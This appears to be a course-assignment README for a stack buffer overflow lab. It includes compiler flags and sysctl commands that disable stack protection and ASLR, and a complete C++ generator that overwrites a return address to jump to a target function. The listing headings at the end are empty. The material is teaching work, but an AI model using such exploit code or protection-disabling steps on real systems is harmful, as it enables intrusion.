Buffer Overflow Attack to run unreachable code.

The attack-string program generates a string used to cause a buffer overflow in a vulnerable program and make it call a chosen function. Based on the buffer size in the vulnerable program, the attack program generates enough characters to fill the buffer and the saved frame pointer. The program then appends the address of the target function to the end of the attack string, overwriting the return address of the current function. When the vulnerable program runs with the attack string as its input, it jumps to the target function when the current function returns. The address bytes are generated according to the endianness of the machine.

Example Demo htaexploit

Installation and Usage:
Step 1:
Use the vulnerable source code at the end of the assignment. Compile it with:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program

Step 2: Disable protections on your VM (use a 32-bit VM)
To make your job easier, you should disable address space layout randomization (ASLR). On Ubuntu-based systems, run the following command:
sudo sysctl -w kernel.randomize_va_space=0

If you are working on a RedHat-based system (e.g., RHEL or Fedora), you will also need to disable Exec-Shield, as follows:
sudo sysctl -w kernel.exec-shield=0

Step 3: Crash the program.
Run the program vuln_program and provide a long input to cause it to crash. How long an input do you need? You can use the source code to analyze why that makes sense. You may also want to use “objdump -D ./vuln_program” or gdb to figure it out.
This article may be of help: Examining a Buffer Overflow in C and assembly with gdb. You may also find this gdb cheat sheet helpful.

Step 4: Exploit the overflow
Now that you understand what’s going on, write an exploit that, instead of causing a crash, causes the program to print out “Haha! I made it!”. There’s an existing function, target, in the executable that prints this. So all you need to do is use the buffer overflow to overwrite the return address on the stack so that it points to target’s address.
You will need to write a separate program that generates the attack string into a file, say, “attack.input”. You then run the vulnerable program as “./vuln_program < ./attack.input” to see whether you can exploit the code to print “Haha! I made it!” without crashing the program.

You can choose any programming language for this assignment, as long as it generates the attack string correctly. You will need to submit a separate readme file that describes the details about why that specific attack string is chosen. We will hand out submission guidelines later.
In your submission, you will need to provide the program that generates the attack string. Given that the address of the target function is X, your program runs as “./attack-string X > ./attack.input”, which writes the attack string to the file attack.input. If your attack string is correct, the message “Haha! I made it!” will be printed without crashing the program.
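The attack-string generator Step 4 describes, written in the language of the attack-string.cpp mentioned below, as an added example that is not the assignment's own script. BUFFER_SIZE is an assumption, since vuln_program.c is not shown here; the 4-byte saved frame pointer and little-endian address order match the 32-bit x86 VM the assignment asks for.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <string>

// Lay out the attack string exactly as the description above says:
// `buffer_size` filler bytes cover the vulnerable buffer, `saved_fp_size`
// more bytes cover the saved frame pointer, and the 4-byte target address
// follows, so it lands on the saved return address. On 32-bit x86 the
// address is stored least-significant byte first (little-endian).
std::string build_attack_string(size_t buffer_size, uint32_t target_addr,
                                bool little_endian = true,
                                size_t saved_fp_size = 4) {
    std::string s(buffer_size + saved_fp_size, 'A');
    for (size_t i = 0; i < 4; ++i) {
        int shift = little_endian ? 8 * i : 8 * (3 - i);
        s.push_back(static_cast<char>((target_addr >> shift) & 0xff));
    }
    return s;
}

// Parse the address argument X from the command line; base 0 accepts
// both "0x08048456" and a decimal value.
uint32_t parse_address(const char* text) {
    return static_cast<uint32_t>(strtoul(text, nullptr, 0));
}

// Usage: ./attack-string X > ./attack.input
int main(int argc, char** argv) {
    const size_t BUFFER_SIZE = 64;  // assumed; take the real value from vuln_program.c
    if (argc != 2) {
        fprintf(stderr, "usage: %s <address of target>\n", argv[0]);
        return 1;
    }
    std::string payload = build_attack_string(BUFFER_SIZE, parse_address(argv[1]));
    // fwrite keeps the address bytes intact (no text conversion, no trailing newline)
    fwrite(payload.data(), 1, payload.size(), stdout);
    return 0;
}
```

If the compiler aligns or pads the stack frame, the distance from the buffer to the return address may exceed buffer size plus 4; use the input length you measured in Step 3 as buffer_size instead of the declared array size.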

Grading: You will need to come to my office to demonstrate the attack within five minutes, using the code you have submitted at Blackboard. Each extra minute will cost you five points. You will have to finish the attack within 15 minutes.

attack-string.cpp Script:

vuln_program.c Script:

Source: https://github.com/TakLun